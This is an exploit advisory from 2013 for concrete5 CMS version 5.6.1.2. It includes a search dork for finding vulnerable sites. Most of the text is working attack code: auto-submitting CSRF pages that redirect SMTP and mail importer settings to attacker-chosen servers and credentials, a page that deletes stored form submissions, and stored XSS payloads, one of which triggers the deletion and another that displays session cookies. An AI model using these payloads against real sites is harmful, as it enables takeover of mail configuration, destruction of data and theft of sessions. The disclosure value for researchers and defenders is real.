=============================================================
        __   __          _    ___    _   __   ____        
        \ \ / /         | |  / _ \  (_) /_ | |___ \       
   ___   \ V /   _ __   | | | | | |  _   | |   __) |  _ __
  / _ \   > <   | '_ \  | | | | | | | |  | |  |__ <  | '__|
 |  __/  / . \  | |_) | | | | |_| | | |  | |  ___) | | |  
  \___| /_/ \_\ | .__/  |_|  \___/  |_|  |_| |____/  |_|  
                | |                                       
                |_|              blackpentesters.blogspot.com
=============================================================
 
###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities]   #
# Date: [2013-6-9]                                            #
# Exploit Author: [expl0i13r]                                         #
# Vendor Homepage: [http://www.concrete5.org/]                                #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/]              #
# Version: [5.6.1.2]                                                              #
# Goole Dork: [Built with concrete5 - an open source CMS]                         #
# Tested on: [Windows]                                                #
# Contact: expl0i13r@gmail.com                                        #
###########################################################################################
 
Summary:
========
 1. CSRF (Modify SMTP Settings)
 2. CSRF (Modify Mail Importers Settings)
 3. CSRF (Delete Form Results)
 4. Stored XSS
 
 
1. CSRF (Modify SMTP Settings):
================================
 
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker
to modify "SMTP Settings" and "Send Mail Method" available at below URL :
 
Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/
 
 
----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update it, when Victim loads this page
----------------------------------------------------------------------------------------
 
<html>
<head>
<script type="text/javascript" language="javascript">
 function submitform()
 {
    document.getElementById('myForm').submit();
 }
 </script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">
 
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">               
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">               
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">               
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option></select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">            
 
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
 
 
2. CSRF (Modify Mail Importer Settings)
=========================================
 
Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.
 
Affected URL :
---------------
 
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/
 
----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update them, when Victim loads this page
----------------------------------------------------------------------------------------
 
<html>
<head>
<script type="text/javascript" language="javascript">
 
 function submitform()
 {
    document.getElementById('myForm').submit();
 
 }
 
</script>
</head>
 
<body>
 
<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">
 
<input type="hidden" name="miID" id="miID" value="1">    
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">           
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">        
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text">         <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">                
             
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>
 
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1"  selected="selected">Yes</option>
</select>            
     
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>            
 
<script type="text/javascript" language="javascript">
 document.myForm.submit()
</script>
 
</body>
</html>
 
 
3. CSRF (Delete Form Results)
===============================
 
Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions.
 
Ex.
---
When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/
 
For above "Contact Form", qsID in my case is "1370626098", which can be found at url:
 
--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------
 
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------
 
In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS.
 
Steps:
------
 
1. Attacker logs in to CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets Static "qsID" value from source code
4. Use "qsID" to create below CSRF exploit
 
Code:
-------
 
<html>
<head>
<script>
function delete()
{
 
# Delete Submissins "Contact Us" page
 
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")
 
}
</script>
</head>
<body onload="delete()">
</body>
</html>
 
 
4. Multiple Stored XSS
=======================
 
concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"
everytime page is loaded.
 
Stored XSS-1
============
 
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/
 
Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">
 
 
XSS-CSRF Payload:
------------------
 
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>
 
 
Stored XSS-2:
=============
 
URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/
 
Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">
 
Payload:
---------
 
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>
 
 
##################################
#           eXpl0i13r            #
# ------------------------------ #
#|blackpentesters.blogspot.com  |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################